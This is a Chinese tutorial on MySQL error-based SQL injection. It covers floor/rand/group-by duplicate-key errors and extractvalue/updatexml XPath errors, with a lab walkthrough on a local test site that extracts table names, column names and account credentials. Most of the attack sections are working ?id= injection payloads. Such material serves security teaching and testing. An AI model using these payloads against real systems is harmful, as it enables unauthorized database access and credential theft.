【SQL注入-04】报错注入案例

2023-10-29

1 报错注入概述

定义:与union联合查询注入类似,报错注入是利用网站的报错信息来带出我们想要的信息。
报错注入的原理:就是在错误信息中执行sql语句。触发报错的方式很多,具体细节也不尽相同.注意,报错注入可能不一定能成功,可以多刷新几次。

使用优先级:考虑到成功率和时间成本比union成本高,因此该方法在uninon无法实施时再做尝试。

  • union联合查询注入实施的条件是网页能回显我们第二条select语句的内容;
  • 报错注入实施的条件是数据库中sql语句的报错信息,会显示在页面中。

sql注入简单口诀

 是否有回显      				union联合查询注入
 是否有报错    					报错注入
 是否有布尔类型状态				布尔盲注
 绝招(没招的招)				延时注入

2 常用的报错注入命令

2.2 group by重复键冲突(count()+floor()+rand()+group by组合)

该种方式的报错注入只要存在回显报错信息,无论mysql版本是多少,都适用。当一次不成功时,多刷新几次。

利用count()、rand()、floor()、group by 这几个特定的函数结合在一起产生的注入漏洞。输入命令报错并带回版本信息?id=1 and (select 1 from (select count(*),concat(0x5e,(select version() from information_schema.tables limit 0,1) ,0x5e,floor(rand()*2))x from information_schema.tables group by x)a)floor()为向下取整;rand()为取0~1的随机数;floor(rand()*2)为0或;group by为分类聚合。其中,x 与a 均为别名,其实院语句为...as x...as a,只是as可以省略。0x5e为“^"符号的16进制。

报错原理:利用数据库表主键不能重复的原理,使用GROUP BY分组,产生主键冗余,导致报错。

在这里插入图片描述

2.2.1 group by重复键冲突的原理及bug演示

关于group by 聚合函数的报错,是mysql的一个bug编号为#8652.当使用rand()函数进行分组聚合时,会产生重复键的错误。
(1)创建数据库,并写入数据

create database groupbyTest;
create table r1 (a int);
insert into r1 values (1),  (2),  (1),  (2),  (1),  (2),  (1),  (2),  (1),  (2);

在这里插入图片描述
(2)简单的查询
select * from r1;
在这里插入图片描述
(3)count()、left()、rand()、group by 的组合应用,产生重复键冲突。还可以利用round()、floor()函数代替left()

select count(*) from r1 group by a;

在这里插入图片描述

select left(rand(),3), a from r1 group by 1;
# group by 1为按照第一列分类聚合
# 由于rand函数的存在,每次执行结果都是不同的

在这里插入图片描述
能否用cont( * )对各随机数出现的次数进行计数,上述sql语句进一步演化如下:

select left(rand(),3), a, count(*) from r1 group by 1;

结果上述sql语句执行,出现了报错信息。那么为什么会出现报错信息呢?先执行from、然后执行group by 1(rand 函数会被执行)、然后执行select(rand 函数会被执行),两次rand的值可能不一样。加上count(*)进行计数后,触发了重复键冲突,所以出现报错信息。
在这里插入图片描述
(4)利用。我们可以利用报错信息,获得数据库中的信息。

select concat(left(rand(),3),'^', version(), '^') as x, count(*) from information_schema.tables group by x; 
# 语句中的as是给concat(left(rand(),3),'^', version(), '^') 起一个别名x,方便后面的聚合操作。此处as可以省略,直接写x即可
select concat(left(rand(),3),'^', version(), '^')x, count(*) from information_schema.tables group by x; 

在这里插入图片描述
如果关键的表被禁用了,可采用如下语句

select concat(left(rand(),3),'^', version(), '^') as x, count(*) from (select 1 union select null union select !1)a group by x; 

如果rand()|count()被禁用了,可采用如下方式

select min(@a:=1) from information_schema.tables group by concat('^', @@version, '^', @a:=(@a+1)%2); 

在这里插入图片描述
不依赖额外的函数和具体的表

select min(@a:=1) from (select 1 union select null union select !1)a group by concat('^', @@version, '^', @a:=(@a+1)%2);=是一种赋值计算

在这里插入图片描述

2.2.2 补充:sql语句解析过程

(1)from

  • from 后面的表标识了这条语句要查询的数据源
  • from 过程之后会形成一个虚拟的表vt1

(2)WHERE

  • WHERE对VT1过程中生成的临时表进行过滤,满足where子句的列被插入到VT2

(3)GROUP BY

  • GROUP BY会把VT2生成的表按照GROUP BY中的列进行分组,生成VT3

(4)HAVING

  • HAVING 这个子句对VT3表中的不同组进行过滤,满足HAVING 条件的子句被加入到VT4表中。

(5)SELECT

  • SELECT这个子句对SELECT子句中的元素进行处理,生成VT5表
    ①计算表达式,计算SELECT子句中的表达式,生成VT5-1
    ②DISTINCT寻找VT5-1表中重复的列,并删掉,生成VT5-2
    ③TOP从ORDER BY子句定义的结果中,筛选出符合条件的列,生成VT5-3

(6)ORDER BY
ORDER BY从VT5-3中的表,根据ORDER BY子句中的结果排序,生成VT6

2.3 XPATH报错

注意,低版本的mysql数据库不支持XPATH报错,比如5.0版本以下的mysql版本没有以下函数

2.3.1 extractvalue()函数

输入命令报错并带回当前用户名。? id=1 and extractvalue(1, concat(0x5c, (select version()),0x5c))
在这里插入图片描述
其中extractvalue()函数语法、参数定义及作用如下:
extractvalue(xml_document,xpath_string)

  • 第一个参数:XML_document是 String 格式,为XMIL文档对象的名称。
  • 第二个参数:XPath_string (Xpath格式的字符串)。

作用: 从目标XML中返回包含所查询值的字符串。
ps: 返回结果限制在32位字符。

2.3.2 updatexml()函数

输入命令报错并带回当前用户名。? id = 1 and updatexml(1,concat(0x5e,(select version()),0x5e),1).

在这里插入图片描述
其中updatexml()函数语法、参数定义及作用如下:
原理:updatexml()函数实际上是去更新了XML文档,但是我们在xml文档路径的位置里面写入了子查询,我们输入特殊字符,然后就因为不符合输入规则然后报错了,但是报错的时候它其实已经执行了那个子查询代码。

语法:updatexml(xml_document,xpath_string,new_value)

  • 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc1
  • 第二个参数: XPath_string (Xpath格式的字符串),如果不了解Xpath语法,可以在网上查找教程。
  • 第三个参数: new_value,String格式,替换查找到的符合条件的数据。

作用: 改变文档中符合条件的节点的值。

2.4 测试失败的命令

以下这些命令测试失败了,后续再研究下,先记录下来。

?id=1 and geometrycollection((select * from(select * from(select user())a)b));
?id=1 and multipoint((select * from(select * from(select user())a)b));
?id=1 and polygon((select * from(select * from(select user())a)b));
?id=1 and multipolygon((select * from(select * from(select user())a)b));
?id=1 and linestring((select * from(select * from(select user())a)b));
?id=1 and multilinestring((select * from(select * from(select user())a)b));
?id=1 and exp(~(select * from(select user())a));

3 报错注入案例

3.1 操作环境

实验靶场——虚拟机(IP为172.16.1.1):本节实验靶场是在win2008系统上基于phpstudy搭建的一个简单网站,win2008及phpstudy的安装过程可以参考《【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统》,网站的搭建过程可以参考《【(SQL+HTML+PHP)综合】一个简单论坛网站的综合开发案例

注入工具——真实机:本实验利用火狐浏览器来实现union注入,为方便注入过程的编码,建议安装一个扩展插件harkbar,安装过程参考《HackBar免费版安装方法》由于该教程中的2.1.3harkbar我安装后无法正常使用,就安装了HackBar Quantum来代替。安装后出现下图左侧的东西。
在这里插入图片描述

3.2 获取敏感信息

以count()+floor()+rand()+group by组合为例,具体演示获取敏感信息的过程

3.2.1 获取数据库名

与上一节union查询类似,使用命令让报错信息显示出站点所在数据库名。?id=1 and (select 1 from (select count(*),concat(0x5e,(select version() from information_schema.tables limit 0,1) ,0x5e,floor(rand()*2))x from information_schema.tables group by x)a)
在这里插入图片描述

3.2.2 获取表名

与上一节union查询类似,使用命令让报错信息显示出站点所在数据库名下所有表名?id=1 and (select 1 from (select count(*),concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 0,1) ,0x5e,floor(rand()*2))x from information_schema.tables group by x)a)?id=1 and (select 1 from (select count(*),concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 1,1) ,0x5e,floor(rand()*2))x from information_schema.tables group by x)a)将limit的偏移量依次递增,直达显示正确结果,说明没有表了。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
上述语句尝试过用group_concat(table_name) from information_schema.tables where table_schema = database()来显示所有行的表名,但是一直不成功。
当采用updatexml()函数时,sql语句可为: ?id = 1 and (updatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schema = database()),0x5e),1))
在这里插入图片描述

3.2.3 获取字段名

与上一节union查询类似,使用命令让报错信息显示出站点所在users表名下所有字段名。
?id=1 and (select 1 from (select count(*),concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name=0x7573657273 limit 0,1) ,0x5e,floor(rand()*2))x from information_schema.tables group by x)a)、…将limit的偏移量依次递增,即[limit 0,1]→[limit 1,1]→[limit 2,1]→[limit 3,1]→…直到显示正确结果,说明没有字段名了。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

当采用updatexml()函数时,sql语句可为: ?id=1 and (updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273),0x5e),1)),可以使用group_concat()函数,更加方便,可以一次性显示所有字段名。
在这里插入图片描述

3.2.4 获取字段内容

与上一节union查询类似,使用命令让报错信息显示users表上账号与密码的字段内容。?id=1 and (select 1 from (select count(*),concat(0x5e,(select concat(name,0x3a,password) from users limit 0,1) ,0x5e,floor(rand()*2))x from information_schema.tables group by x)a)
在这里插入图片描述

修改sql语句如下:?id=1 and (select 1 from (select count(*),concat(0x5e,(select name from users limit 0,1) ,0x5e,floor(rand()*2))x from information_schema.tables group by x)a)
在这里插入图片描述

改为采用updatexml()函数时,sql语句可为:? id=1 and (updatexml(1,concat(0x5e,(select concat(name,0x3a,password) from users limit 0,1),0x5e),1)),显示结果如下。当想查询其余账户密码时,将limit的偏移量依次递增,即[limit 0,1]→[limit 1,1]→[limit 2,1]→[limit 3,1]→…直达显示正确结果,说明没有字段内容了。当字段内容过长时,结尾少了部分密码且少了结束符。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4 总结

(1)SQL注入优先级:union注入>报错注入>布尔盲注>延迟注入;
(2)掌握报错注入常用的几个命令;
(3)掌握进行报错注入的方法及流程;
(4)updataxml()对仅能获取返回32位字符,对于长字符串需要分批次获取。

参考文章

[1] 《【SQL注入03】报错注入实例操作》

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

【SQL注入-04】报错注入案例 的相关文章

  • 数据库连接用法

    1 内联接 典型的联接运算 使用像 或 lt gt 之类的比较运算符 包括相等联接和自然联接 内联接使用比较运算符根据每个表共有的列的值匹配两个表中的行 例如 检索 students和courses表中学生标识号相同的所有行 2 外联接 外
  • Java编程工具哪种好?

    Java强大的功能需要依托在软件工具上实现 所以Java编程开发需要用到编程工具 市面上有哪些Java编程工具呢 那种编程工具好呢 该怎么选择呢 接下来罗列了一系列的Java编程开发工具 一 idea 这是jetbrains公司的产品 也是
  • 从0实现基于Linux socket聊天室-多线程服务器模型-1

    前言 Socket在实际系统程序开发当中 应用非常广泛 也非常重要 实际应用中服务器经常需要支持多个客户端连接 实现高并发服务器模型显得尤为重要 高并发服务器从简单的循环服务器模型处理少量网络并发请求 演进到解决C10K C10M问题的高并
  • linux下gcc/g++编译器使用

    linux编译器gcc g 使用 1 gcc 编译器编译c语言程序 gcc 文件名 默认生成a out 可执行程序程序 我们执行a out由两种方法 相对路径 绝对路径 进行程序的翻译 1 预处理 进行宏替换 头文件展开 去注释 条件编译
  • kettle开发篇-流查询-Day25

    前言 昨天我们讲了数据库相关操作 数据库连接来实现两个库的跨库查询 对应复杂的跨库查询通过数据库连接整合到一块后 就像是在一个数据库里面操作 今天我们来学习流查询 流查询主要用于在查询前把数据加载到内存中 并且只能进行等值查询 一 流查询
  • 51单片机波特率计算c语言,51单片机波特率怎么算?51单片机波特率计算公式

    51单片机波特率怎么算 51单片机波特率计算公式 方式0 方式0的波特率固定为主振频率的1 12 方式2 方式2的波特率由PCON中的选择位SMOD来决定 可由下式表示 波特率 2的SMOD次方除以64再乘一个fosc 也就是当SMOD 1
  • Spring三大核心思想详解

    spring核心思想分三大类 控制反转 IOC 依赖注入 DI 和面向切面 AOP 控制反转 通俗讲 控制权由应用代码中转到了外部容器 控制权的转移 是所谓反转 也就是说 正常我们都是新建对象 才可以调用对象 现在不需要了 交给容器来管理
  • 数据结构与算法(29):KMP算法(核心思想分析)及其相关应用实例(与暴力字符串匹配代码实现)

    应用场景 字符串匹配问题 字符串匹配问题 有一个字符串 str1 陈骁聪 陈骁聪你陈骁 陈骁聪你陈骁聪你陈骁你好 和一个子串 str2 陈骁聪你陈骁你 现在要判断 str1 是否含有 str2 如果存在 就返回第一次出现的位置 如果没有 则
  • 如何引入elementUI

    elementUI的引入 完整引入 按需引入 完整引入 在 main js 中写入以下内容 import Vue from vue import ElementUI from element ui import element ui lib
  • vue移动端拖拽悬浮按钮

    vue移动端拖拽悬浮按钮 功能介绍 大致需求 整体思路 简单效果展示 具体实现 一 position fixed布局 二 touch事件绑定 三 页面引入 功能介绍 在移动端开发中 实现悬浮按钮在侧边显示 为不遮挡页面内容 允许手指拖拽换位
  • 发起HTTP请求--Curl

    curl 是常用的命令行工具 用来请求 Web 服务器 它的名字就是客户端 client 的 URL 工具的意思 它的功能非常强大 命令行参数多达几十种 如果熟练的话 完全可以取代 Postman 这一类的图形界面工具 我们可以使用cURL

随机推荐

  • CTFshow(web21-web28)

    web21 考点tomcat 认证爆破之custom iterator使用 https www cnblogs com 007NBqaq p 13220297 html 下载密码字典抓包 通过burpsuite暴力破解 Payload se
  • 原生JS实现ajax 发送post请求

    1 代码 原生JS实现ajax 发送post请求
  • fluxion 无法连接虚假AP热点,DHCP服务启动失败

    记录一个使用fluxion时 无法连接至虚假AP的DHCP问题 编辑 fluxion attacks Captive Portal attack sh gedit fluxion attacks Captive Portal attack
  • 基于Spring-AOP写的切面和注解,解决一些跟业务逻辑无关的公共问题处理方法

    技术点 Spring Aop 反射 背景 目前在做一个项目 做数据库设计的时候对一些表进行了埋点 比如跟我业务相关的每个表 都有create time create user id create user name update time
  • 训练正常&异常的GAN损失函数loss变化应该是怎么样的

    这里以个人用到的一个网络为例 仅供参考 不代表所有情形 用tensorboard记录loss曲线的走向 横轴为迭代次数 iter 纵轴为损失 loss 值 正常的 判别器loss loss在2 6到3 4之间来回上下波动 注意 在tenso
  • WIN10手动添加开机启动项,自己测试可用

    方法 开机启动文件夹 1 我们打开文件夹 C Users 用户 Administrator 当前用户名 AppData Roaming Microsoft Windows Start Menu Programs 开始 菜单 Programs
  • Git Tag 打标签

    晚来天欲雪 能饮一杯无 这位大侠 硬套路在此 接招 提交标签 git add git commit m fixed some bugs git tag a 0 1 3 m Release version 0 1 3 可以给指定commit打
  • element基础详情页-文本描述组件

    欢迎点击领取 前端面试题进阶指南 前端登顶之巅 最全面的前端知识点梳理总结 分享一个使用比较久的 最新版本element ui 已支持详情描述组件 直接使用即可 前言 对于常做topB系统的小伙伴们 基础信息详情页是最常见不过的 使用 只是
  • android打开sdcard读写文件、访问网络权限

    去工程的AndroidManifest xml 添加
  • dubbo分布式系统链路追踪_zipkin

    基础知识储备 分布式跟踪的目标 一个分布式系统由若干分布式服务构成 每一个请求会经过多个业务系统并留下足迹 但是这些分散的数据对于问题排查 或是流程优化都很有限 要能做到追踪每个请求的完整链路调用 收集链路调用上每个服务的性能数据 计算性能
  • single-passParallel Prefix Scan with Decoupled Look-back

    背景 最近在写基数排序 nvidia的基数排序依赖这个实现 所以有必要搞懂 原理 代码 总结 参考
  • windows下如何搭建属于自己的git服务器

    前一阵子公司需要 领导让我给我们技术部搭建一个git服务器 以前看过教程 但自己没动手做过 开始按照网上的教程来 但搭建过程中发现还是不够详细 今天给大家一个比较详细的 希望对大家有帮助 高能预警 这不是一个问题 这是一个技术贴 咳咳 进入
  • 管理系统-------SPU

    目录 静态页面 api接口 二次封装ui button组件 代码 v attrs的用法详解与原理 listeners spuForm spuForm静态页面 spuForm逻辑分析 完整代码 spu完整代码 静态页面
  • 在vue export default 外部调用内部的属性或方法

  • C++超详细五子棋游戏(AI实现人机对弈+双人对弈+EasyX图形化界面+详细介绍)

    目录 一 准备工作 1 开发环境 2 EasyX的下载和安装 二 游戏规则 1 行棋顺序 2 判断胜负 3 四种重要棋型解释 重点 4 禁手规则 三 双人对弈详细剖析 1 落子 2 判胜 四 人机对弈超详细剖析 1 整体代码分析 2 玩家落
  • 分类算法简述

    分类算法简述 一 什么是分类算法 数据挖掘任务通常分为两大类 预测任务 根据其他属性的值 预测特定属性的值 描述任务 概括数据中潜在联系的模式 相关性 趋势 聚类 轨迹和异常 分类属于预测任务 就是通过已有数据集 训练集 的学习 得到一个目
  • CH2-开发工具DevEco Studio

    文章目录 本章节目标 一 DevEco基本特性 主要功能 基本特性 应用开发流程 二 安装过程 搭建开发环境流程 下载和安装Node js 下载和安装DevEco Studio 配置开发环境 网络设置 设置npm仓库 三 Gradle的作用
  • 软件测试大厂面试真题,分享一波经验!!

    你好 我是小牛 在这家公司待了两年了 基本上功能 自动化 性能都有做 而且公司系统相对比较复杂 链路比较长 相对来说 还是能学习到不少东西 而且比较难得的一点是 公司加班相对来说比较少 一般七点左右就能走了 偶尔加班到九点 可以说是十分安逸
  • XSSGAME小游戏(XSS学习)level1-15

    XSS源码下载 xssgame 本地搭建 level1 查看源码
  • 【SQL注入-04】报错注入案例

    目录 1 报错注入概述 2 常用的报错注入命令 2 2 group by重复键冲突 count floor rand group by组合 2 2 1 group by重复键冲突的原理及bug演示 2 2 2 补充 sql语句解析过程 2